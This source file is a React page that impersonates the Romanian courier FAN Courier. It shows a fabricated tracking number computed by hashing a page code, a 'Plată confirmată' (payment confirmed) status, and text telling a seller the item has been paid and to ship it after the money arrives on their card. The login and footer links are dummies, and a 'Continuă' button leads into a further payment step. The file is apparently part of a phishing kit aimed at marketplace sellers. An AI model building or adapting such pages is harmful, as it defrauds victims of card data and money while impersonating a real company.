import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './FanCourierRoSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/fan-courier-ro-logo.svg`;

function noop(e) {
  e.preventDefault();
}

function trackingFromPage(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  if (!raw) return '—';
  let h = 0;
  for (let i = 0; i < raw.length; i += 1) h = (h * 31 + raw.charCodeAt(i)) >>> 0;
  return String(100000000 + (h % 900000000));
}

function FanCourierRoSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'RO').toUpperCase();
  const symbol = getSymbol(getPrimaryCurrency(countryCode));
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const priceDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const tracking = useMemo(
    () => trackingFromPage(pageCode || '', pageData),
    [pageCode, pageData],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="fc-wrap" lang="ro">
        <div className="fc-loading">Se încarcă…</div>
        <div className="fc-support-wrap">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="fc-wrap" lang="ro">
      <header className="fc-header-bar">
        <div className="fc-header">
          <a href="#/" className="fc-logo" onClick={noop}>
            <img src={LOGO_SRC} alt="FAN Courier" decoding="async" />
          </a>
          <a href="#/" className="fc-login" onClick={noop}>
            <svg className="fc-login-ic" width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
              <circle cx="12" cy="9" r="3.5" stroke="currentColor" strokeWidth="1.7" />
              <path d="M6 20c0-3.5 3-6 6-6s6 2.5 6 6" stroke="currentColor" strokeWidth="1.7" strokeLinecap="round" />
            </svg>
            Autentificare
          </a>
        </div>
      </header>

      <section className="fc-hero">
        <div className="fc-hero-inner">
          <h1 className="fc-hero-title">Trace</h1>
          <input
            type="text"
            className="fc-trace-input"
            readOnly
            value={tracking}
            aria-label="Număr de urmărire"
          />
          <p className="fc-hero-hint">
            Sfat: puteți introduce până la 10 numere de urmărire, separate prin spații sau virgule
          </p>
        </div>
      </section>

      <main className="fc-main">
        <div className="fc-status-block">
          <p className="fc-status-line">
            <strong>Număr de urmărire:</strong>{' '}
            <span className="fc-track-num">{tracking}</span>
          </p>
          <p className="fc-status-line">
            <strong>Status:</strong>{' '}
            <span className="fc-track-num">Plată confirmată</span>
          </p>
        </div>

        <h3 className="fc-pkg-title">Pachete de date:</h3>
        <div className="fc-table-wrap">
          <table className="fc-table">
            <tbody>
              <tr>
                <th scope="row">Produs:</th>
                <td>{productName}</td>
              </tr>
              <tr>
                <th scope="row">Adresa de livrare:</th>
                <td>{address}</td>
              </tr>
              <tr>
                <th scope="row">Preț:</th>
                <td>{priceDisplay}</td>
              </tr>
              <tr>
                <th scope="row">Număr de urmărire:</th>
                <td className="fc-track-num">{tracking}</td>
              </tr>
            </tbody>
          </table>
        </div>

        <div className="fc-card">
          <h2>Articolul dvs. a fost plătit!</h2>
          <p>
            După ce primiți banii pe cardul dvs., trimiteți-l cumpărătorului conform datelor de mai sus.
          </p>
          <p>
            După expedierea mărfurilor, furnizați cumpărătorului numărul de urmărire.
          </p>
          <Link to={index2Path} className="fc-cta">
            Continuă
          </Link>
        </div>
      </main>

      <nav className="fc-foot-nav" aria-label="Footer">
        <a href="#/" onClick={noop}>
          Despre noi
        </a>
        <a href="#/" onClick={noop}>
          Contactați-ne
        </a>
        <a href="#/" onClick={noop}>
          Retragerea produsului
        </a>
        <a href="#/" onClick={noop}>
          Excursie
        </a>
        <a href="#/" onClick={noop}>
          Comunitate
        </a>
      </nav>

      <footer className="fc-foot-dark">
        <p>
          Informațiile privind expedierea și plata sunt afișate conform datelor introduse. Pentru termeni
          comerciali, politica de confidențialitate și condiții de utilizare, consultați site-ul oficial FAN
          Courier. Continuând, confirmați că ați înțeles pașii pentru predarea coletului și urmărirea
          expedierii.
        </p>
      </footer>

      <div className="fc-support-wrap">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default FanCourierRoSuccess;
